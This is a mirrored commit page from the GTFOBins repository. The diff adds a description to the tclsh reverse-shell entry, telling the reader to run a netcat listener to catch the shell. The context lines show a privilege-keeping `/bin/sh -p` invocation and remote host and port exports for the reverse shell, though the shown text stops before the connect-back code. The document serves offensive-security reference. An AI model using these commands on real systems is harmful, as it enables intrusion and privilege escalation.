mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add tclsh reverse shell description
This commit is contained in:
parent
24a7c20324
commit
5f5598b1c3
@ -13,7 +13,7 @@ functions:
|
||||
./tclsh
|
||||
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
||||
reverse-shell:
|
||||
- description:
|
||||
- description: Run `nc -l -p 8000` to receive the shell on the other end.
|
||||
code: |
|
||||
export RHOST=10.0.0.1
|
||||
export RPORT=8000
|
||||
|
Loading…
Reference in New Issue
Block a user